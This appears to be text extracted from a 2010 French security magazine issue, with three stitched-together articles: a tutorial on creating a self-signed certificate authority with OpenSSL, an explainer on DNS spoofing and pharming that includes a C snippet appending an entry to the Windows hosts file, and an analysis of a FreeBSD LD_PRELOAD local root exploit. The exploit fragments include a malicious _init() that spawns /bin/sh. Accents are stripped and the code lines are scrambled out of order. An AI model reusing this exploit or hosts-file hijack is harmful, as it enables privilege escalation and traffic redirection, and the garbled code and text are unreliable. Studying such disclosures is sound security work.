certification ou CA(Certification Authority), qui dlivre le
Il est trs simple de crer des certificats auto-signs avec OpenSSL, le plus simple est d'utiliser le script Perl inclus avec OpenSSL
pour crer des certificats CA.pl facilement.
Cependant, il ne permet pas une configuration du CA, il est donc prfrable d'en recrer un. Voici les diffrentes tapes :
Il faut d'abord crer l'arborescence des dossiers et des fichiers.
listing 1. Cration d'une arborescence pour une autorit de certification
mkdir monAC
mkdir monAC/certs
monAC/newcerts
monAC/private
On a l'arborescence de base il faut ensuite copier le openssl.cnf dans le dossier pour pouvoir personnaliser notre autorit de certification.
cp /etc/ssl/openssl.cnf monAC/
Il faut cependant modifier une ligne dans le fichier
dir = ./demoCA en dir = .
On peut donc maintenant modifier le openssl.cnf pour modifier le comportement du CA c'est dire la longueur des cls par dfaut,
ajout de la gestion des SAN pour les certificats serveurs etc..
Attention, la configuration du fichier openssl.cnf est un peu dlicate et peut ncessiter de l'exprience pour comprendre son
fonctionnement.
Il ne reste plus qu' gnrer le certificat du CA qui servira signer les autres certificats.
On gnre la cl prive
openssl genrsa -aes256 -out monAC/private/cakey.pem 2048
On gnre le certificat partir de la cl prive
openssl req -new -x509 -days 365 -key monAC/private/cakey.key -out monAC/private/cacert.pem
Le CA ne sera valide qu'un an avec cette commande.
Il ne reste plus qu'a crer le certificat utilisateur
openssl genrsa -out monAC/private/cuser-privee.pem 2048
On cre la CSR qui sera soumise l'autorit de certification que l'on vient de crer :
openssl req -new -nodes -key monAC/private/user-privee.pem -out monAC/newcerts/csr.pem
Le CA doit maintenant signer la CSR pour gnrer le certificat :
openssl ca -in monAC/newcerts/csr.pem -out monAC/certs/user-public.pem -key le monAC/private/cakey.pem -cert monAC/
private/cacert.pem -cong monAC/openssl.cnf
Il est important de prciser le fichier de configuration dans lequel sera lu les informations par dfaut, dure de validit etc.. Si rien
n'est prcis le fichier de configuration utilis est /etc/ssl/openssl.cnf
Note pour acher ce que permet le certificat il faut faire :
openssl x509 -purpose -in certificat.pem -noout
Pour rendre le certificat utilisable il ne reste plus qu'a le convertir en PKCS 12.
openssl pkcs12 -export -in monAC/certs/user-public.pem -inkey monAC/private/user-privee.pem -out certificat.p12
Ceci est donc une mthode rapide et ecace de crer des certificats auto-signs. Il est aussi possible de mettre en place une architecture beaucoup plus complexe avec cette fois-ci un vrai PKI. Il existe un grand nombre de logiciels permettant de mettre en
place un PKI avec, rpondeur OCSP, gestion des listes de rvocations etc. Pour cela il faut se tourner vers EJBCA, OpenCA ou encore NewPKI.
34
6/2010
Caractristiques techniques
Vrification certificat
hakin9.org/fr
35
Scurit rSeaux
Il existe un certains nombre de classes pour les certificats personnels (voir chapitre suivant), cependant pour
un usage personnel, les certificats de classe 1 restent
les plus adapts d'autant plus que l'on peut s'en procurer gratuitement. Voici diffrents liens :
InstantSSL une autorit intermdiaire issue de Comodo :
https://secure.instantssl.com/products/frontpage?are
a=SecureEmailCertificate¤cy=EUR®ion=Eur
ope&country=FR&entryURL=http%3A//www.instantssl.
com/&referrerURL=http%3A//www.google.fr/search%3
Fhl%3Dfr%26q%3Dinstantssl%26aq%3Df%26aqi%3D
g1%26aql%3D%26oq%3D%26gs_rfai%3D
TBS :
https://www.tbs-internet.com/php/HTML/commande.
php?p=2&id=106
Secorio:
https://secure.comodo.net/products/frontpage?ap=S
ecorio&area=SecureEmailCertificate&product=9&days
=365
A noter qu'il est tout fait possible de signer soimme un certificat ce qui peut tre intressant pour
un usage interne condition de diffuser le certificat
signataire autrement dit celui de l'autorit de certification cre.
terminologie
36
Scurit rSeaux
Tous les certificats sont bass sur la norme de certificat X.509 cre par l'Union Internationale des
Tlcommunication(UIT). Les certificats sont principalement utiliss pour la scurisation des changes sur
les sites web avec SSL/TLS, on appelle a des certificats serveurs. Les certificats utiliss pour S/MIME sont
appels certificats personnels. Mais il en existe des
diffrents pour dautres utilisations (voir ci-dessous).
Dirents certificats
Il existe une classification dans le niveau de confiance d'un certificat personnel. Celle-ci est divise en plusieurs classes que voici :
Sur internet
38
la valeur juridique
Pour ce qui concerne l'aspect juridique, le caractre dcentralis de PGP rend la valeur des cls nulles. En
6/2010
propos de l'auteur
Suite a un DUT informatique Grenoble et un court passage l'Institut Laue-Langevin, l'auteur tudie actuellement
l'informatique l'universit de Napier en cosse. Passionn d'informatique depuis longtemps, il s'intresse tout particulirement au rseau et l'architecture systme, plus spcialement Linux et BSD.
hakin9.org/fr
39
Attaque
Le protocole DNS
Le DNS Spoofing
Le DNS ID Spoofing
Jean
Jean se connecte
website.com
partir de son
adresse IP
Website.com
41
Attaque
Le Pharming
Root Servers
org
fr
Hakin9
com
...
42
6/2010
Victime
Victime
Le pirate envoie de
nombreuses donnes pour
empoisonnser le cache DNS
du serveur cible, infectant
ainsi toutes les requtes des
pc's qui utiliseront ce serveur
DNS
Serveur Cache
DNS
Pirate
hakin9.org/fr
43
Attaque
Site malicieurx.com
La victime va pour
accder un site
malicieux
Victime
Le site malicieux
renvoie du code qui va
faire des changements
sur sa box
Figure 5. changement de certains paramtres, pour rediriger la victime vers des sites frauduleux.
44
6/2010
Annexes :
http://fr.wikipedia.org/wiki/Domain_Name_System Article de
Wikipdia sur le protocole DNS
http://fr.wikipedia.org/wiki/Domain_Name_System_Security_
Extensions Article de Wikipdia sur DNSSEC
http://www.authsecu.com/brute-force-dns/brute-force-dns.
php Article qui traite de la brute-force des noms de domaines
http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html Un
guide illustr sur la faille DNS de Dan Kaminsky durant
l't 2008
http://www.securiteinfo.com/attaques/hacking/dnsspoofing.
shtml Article intressant sur le DNS Spoong (incluant les
deux attaques prsentes dans l'article)
http://fr.wikipedia.org/wiki/Pharming Article de Wikipdia sur
le Pharming
Avant tout, DNSSEC s'appuie sur des signatures cryptographiques qui permettent de signer les inscriptions DNS actuelles.
Cela permet de dtecter d'ventuelles fraudes et ainsi,
viter une victime d'tre pige. Cela ressemble un
gage de qualit permettant de garantir que toutes les informations reues sont effectivement celles demanes.
Listing 1. Code C pour Pharming local.
<code C pour du Pharming en local>
#include <stdlib.h>
#include <stdio.h>
int main(void) {
Conclusion
pharming = fopen("%SYSTEMROOT%\system32\drivers\
etc\hosts", "a");
if (pharming != NULL)
fputs("209.85.229.104 hakin9.org",
pharming);
fclose(pharming);
else
}
}
return EXIT_SUCCESS;
</code>
hakin9.org/fr
A PROPOS De L'AuteuR :
L'auteur est actuellement tudiant en DUT Informatique l'IUT
de Fontainebleau.
Il s'intresse de trs prs tout ce qui a trait la scurit informatique afin de comprendre les problmes associs. Il
aimerait par la suite continuer ses tudes dans une cole
d'ingnieur.
45
Focus
e full disclosure (ou le fait de divulguer publiquement les problmes de scurit ou les exploits)
est quelque chose de primordial chez les passionns de scurit informatique.
Il permet (entre autre) a chacun de pouvoir tudier
les problmes dcouvert par d'autre personne, de comprendre leurs fonctionnement et de scuriser ses propres codes.
L'exemple de l'exploit tudi dans cet article est trs
formateur sans demander une trs forte connaissance
du systme ou du C.
Fonctionnement de LD_PRELOAD?
Nous voyons que listing1 utilise prsent notre propre librairie. Cette astuce est trs utile pour debugger.
Il existe une fonction particulire _ init() qui est lanc
ds l'excution du main. Et qui permet de ne pas cibler
une fonction spcifique.
Il y a toutefois une limitation a cette fonctionnalit :
il n'est pas possible d'utiliser LD_PRELOAD sur un binaire suid. La premire chose que fait FreeBSD lors de
l'excution d'un binaire suid est de vider cette variable.
Il fait a par scurit pour viter d'excuter du code arbitraire en temps que root via notre librairie. C'est a ce
niveau que va agir notre exploit.
Analyse de l'exploit
Le listing 4 montre le morceau de code qui lance la purge de certaines variables en cas de bit suid.
system("echo ALEX-ALEX;/bin/sh");
#include <stdio.h>
}
int main()
{
_EOF
printf("pid : %u\n",getpid());
return(0);
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
#include <stdio.h>
#include <sys/types.h>
func_ptr_type
pid_t getpid(void)
{
}
return(31337);
Entry **objp)
...
trust = !issetugid();
...
/*
#!/bin/sh
echo ** FreeBSD local r00t zeroday
dangerous environment
echo by Kingcope
* variables.
* is called.
*/
unsetenv(LD_ "PRELOAD");
environ[0] = (char*)malloc(1024);
unsetenv(LD_ "LIBMAP");
environ[1] = (char*)malloc(1024);
unsetenv(LD_ "LIBRARY_PATH");
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.
unsetenv(LD_ "LIBMAP_DISABLE");
so.1.0");
unsetenv(LD_ "DEBUG");
point. */
*exit_proc = rtld_exit;
*objp = obj_main;
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
unsetenv(LD_ "ELF_HINTS_PATH");
...
_EOF
#include <sys/types.h>
safe variables.
if (!trust) {
environ = (char**)malloc(8096);
void _init() {
hakin9.org/fr
47
Focus
Conclusion
No variable is
*/
int
int envNdx;
size_t nameLen;
/* Check for malformed name. */
errno = EINVAL;
return (-1);
/* Initialize environment. */
envVars[envNdx].active = false;
if (envVars[envNdx].putenv)
__remove_putenv(envNdx);
48
__rebuild_environ(envActive - 1);
return (0);
6/2010
__merge_environ(void)
{
char **env;
...
char *equals;
/*
origEnviron = environ;
if (origEnviron != NULL)
return (-1);
return (-1);
return (0);
unsetenv(LD_ "PRELOAD");
unsetenv(LD_ "LIBMAP");
unsetenv(LD_ "DEBUG");
unsetenv(LD_ "ELF_HINTS_PATH");
if (unsetenv(LD_ "PRELOAD") ||
unsetenv(LD_ "LIBMAP") ||
unsetenv(LD_ "LIBRARY_PATH") ||
unsetenv(LD_ "LIBMAP_DISABLE")
||
unsetenv(LD_ "DEBUG") ||
_rtld_error("environment corrupt;
unsetenv(LD_ "ELF_HINTS_PATH"))
{
aborting");
die();
}
hakin9.org/fr
unsetenv(LD_ "LIBMAP_DISABLE");
unsetenv(LD_ "LIBRARY_PATH");
sur Internet
PRoPos DE L'AuTEuR
Paul Rascagnres est un consultant informatique spcialis
en UNIX (Solaris, AIX, Linux et BSD) et en Scurit depuis plus
de 5 ans. Il a travaill chez des fabricants automobile ainsi que
dans des banques franaises et luxembourgeoises. Il est galement chercheur en scurit a titre priv, dans ce cadre il anime de nombreuses communauts de passionn en scuritsur
internet.
Pour contacter l'auteur : https://www.r00ted.com
49